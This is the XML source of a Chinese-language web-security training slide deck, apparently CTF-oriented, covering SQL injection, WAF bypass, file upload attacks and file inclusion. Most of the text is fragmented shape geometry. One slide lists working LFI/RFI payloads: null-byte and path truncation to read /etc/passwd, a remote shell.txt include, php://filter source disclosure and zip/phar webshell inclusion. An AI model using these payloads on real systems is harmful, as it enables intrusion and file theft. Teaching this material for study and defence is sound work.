                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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7" name="任意多边形 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3846513" y="1973263"/>
            <a:ext cx="1963737" cy="1530350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="1532495"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1530465"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1187618"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="1188737"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1594619" y="766246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="344875"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="2030"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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8" name="任意多边形 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6324600" y="1998663"/>
            <a:ext cx="1965325" cy="1528762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1967559" y="763866"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1201617" y="1527731"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="1525709"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="1527730"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1527730"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1185042"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="1185042"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="1183927"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1176167" y="1185043"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1598490" y="763865"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1176167" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="343804"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1165068" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1181486" y="2024"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1201617" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1967559" y="763866"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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9" name="任意多边形 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8837613" y="1973263"/>
            <a:ext cx="1963737" cy="1530350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="1532495"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1530465"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1532493"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1188736"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1187618"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="1188737"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1594619" y="766246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="344875"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="343756"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="2030"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1962793" y="766248"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1964209" y="1186938"/>
                  <a:pt x="1621868" y="1529279"/>
                  <a:pt x="1199570" y="1529279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1527254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1529278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1186242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="1185126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1174164" y="1186243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1407009" y="1186243"/>
                  <a:pt x="1595768" y="997484"/>
                  <a:pt x="1595768" y="764639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1595768" y="531793"/>
                  <a:pt x="1407009" y="343035"/>
                  <a:pt x="1174164" y="343035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1163084" y="344152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163084" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1179474" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199570" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1621868" y="0"/>
                  <a:pt x="1964209" y="342341"/>
                  <a:pt x="1964209" y="764640"/>
                </a:cubicBez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50" name="文本框 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547178" y="5048250"/>
            <a:ext cx="16306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SQL</a:t>
            </a:r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注入类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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51" name="燕尾形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4611688" y="3703638"/>
            <a:ext cx="477837" cy="563562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2" name="燕尾形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4529138" y="3946525"/>
            <a:ext cx="642937" cy="75565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3" name="文本框 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3741103" y="5048250"/>
            <a:ext cx="239649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SQL</a:t>
            </a:r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注入进一步利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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54" name="燕尾形 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7075488" y="3703638"/>
            <a:ext cx="477837" cy="563562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5" name="燕尾形 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6991350" y="3946525"/>
            <a:ext cx="642938" cy="75565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6" name="文本框 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508115" y="5048250"/>
            <a:ext cx="167259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绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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WAF</a:t>
            </a:r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限制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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57" name="燕尾形 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9599613" y="3703638"/>
            <a:ext cx="477837" cy="563562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8" name="燕尾形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9517063" y="3946525"/>
            <a:ext cx="642937" cy="75565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9" name="文本框 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9017000" y="5048250"/>
            <a:ext cx="163068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SQL</a:t>
            </a:r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注入杂技</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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60" name="文本框 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047875" y="2441575"/>
            <a:ext cx="60642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sz="3600" dirty="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261" name="文本框 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511675" y="2441575"/>
            <a:ext cx="6635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sz="3600" dirty="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262" name="文本框 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6994525" y="2447925"/>
            <a:ext cx="6762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zh-CN" altLang="en-US" sz="3600" dirty="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263" name="文本框 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9499600" y="2447925"/>
            <a:ext cx="661988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04</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="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2" name="图片 1" descr="XCTFb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700405"/>
            <a:ext cx="10515600" cy="54571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难点：临时文件生存周期极短，如何延长？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分块传输编码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通过分块传输编码，提前获知临时文件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名称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通过增加临时文件名后数据长度来延长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时间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通过大量请求来延迟PHP脚本的执行速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度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50" y="328930"/>
            <a:ext cx="3161030" cy="64312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2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&lt;?php include("inc/" . $_GET['file'] . ".htm"); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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微软雅黑" panose="020B0503020204020204" charset="-122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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>%00截断?file=../../../../../../../../../etc/passwd%00，(需要 magic_quotes_gpc=off，PHP小于5.3.4有效)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122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路径长度截断：?file=../../../../etc/passwd/././././.[…]/./././././.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(php版本小于5.2.8(?)可以成功，linux需要文件名长于4096，windows需要长于256)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点号截断：?file=../../../../../../../../../boot.ini/…[…]…(php版本小于5.2.8(?)可以成功，只适用windows，点号需要长于256)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有限制的</a:t>
            </a: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LFI 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&lt;?php include($_GET['file']); ?&gt;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远程代码执行：?file=[http|https|ftp]://example.com/shell.txt，(需要allow_url_fopen=On并且 allow_url_include=On)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php://input：接收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post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数据allow_url_include=On下直接包含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代码会被执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1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?file=data://text/plain;base64,base64类似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读取源码：?file=php://filter/convert.base64-encode/resource=index.php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phar://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zip://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伪协议解压缩包含一句话木马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远程文件包含</a:t>
            </a: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RFI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2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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218" name="任意多边形 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1782763" y="0"/>
            <a:ext cx="3582987" cy="1990725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 3582460"/>
              <a:gd name="txT" fmla="*/ 0 h 1991022"/>
              <a:gd name="txR" fmla="*/ 3582460 w 3582460"/>
              <a:gd name="txB" fmla="*/ 1991022 h 1991022"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3328710" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="255333" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1543474"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882324" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2701718" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="3584041" y="1543474"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="3582460" h="1991022">
                <a:moveTo>
                  <a:pt x="3327242" y="1991022"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="255219" y="1991022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1544164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881934" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2700526" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3582460" y="1544164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3327242" y="1991022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9" name="任意多边形 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1990725"/>
            <a:ext cx="2484438" cy="3089275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 2483870"/>
              <a:gd name="txT" fmla="*/ 0 h 3088328"/>
              <a:gd name="txR" fmla="*/ 2483870 w 2483870"/>
              <a:gd name="txB" fmla="*/ 3088328 h 3088328"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="2485574" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1545586"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2485574" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="2483870" h="3088328">
                <a:moveTo>
                  <a:pt x="2483870" y="3088328"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="881934" y="3088328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1544164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881934" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2483870" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2483870" y="3088328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0" name="任意多边形 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2065338" y="4154488"/>
            <a:ext cx="4710112" cy="2703512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 4711161"/>
              <a:gd name="txT" fmla="*/ 0 h 2702918"/>
              <a:gd name="txR" fmla="*/ 4711161 w 4711161"/>
              <a:gd name="txB" fmla="*/ 2702918 h 2702918"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3548990" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1159025" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="672689"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="383691" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4324326" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4708012" y="672689"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="4711161" h="2702918">
                <a:moveTo>
                  <a:pt x="3551362" y="2702918"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1159799" y="2702918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383946" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4327215" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4711161" y="672245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3551362" y="2702918"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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1" name="文本框 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651250" y="4822825"/>
            <a:ext cx="1743075" cy="18586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1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284D7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zh-CN" altLang="en-US" sz="11500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284D7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222" name="文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2587625"/>
            <a:ext cx="4599940" cy="7156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方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>File Uploading Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000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9223" name="文本框 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327900" y="3406775"/>
            <a:ext cx="3368675" cy="1139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          </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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Click here to add  you to the  center of the  narrative </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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Thought  Click here to add   you to the  center of the </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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                             narrative thought</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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9224" name="直接连接符 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8939213" y="1704975"/>
            <a:ext cx="0" cy="3598863"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EBEDEC">
                <a:alpha val="50195"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:bevel/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="XCTFb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F2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322263" y="881063"/>
            <a:ext cx="11552237" cy="5568950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="E3E7E5">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="961">
                <a:srgbClr val="E3E7E5">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="56000">
                <a:srgbClr val="F7F7F7">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E3E7E5">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="108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文本框 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824288" y="114300"/>
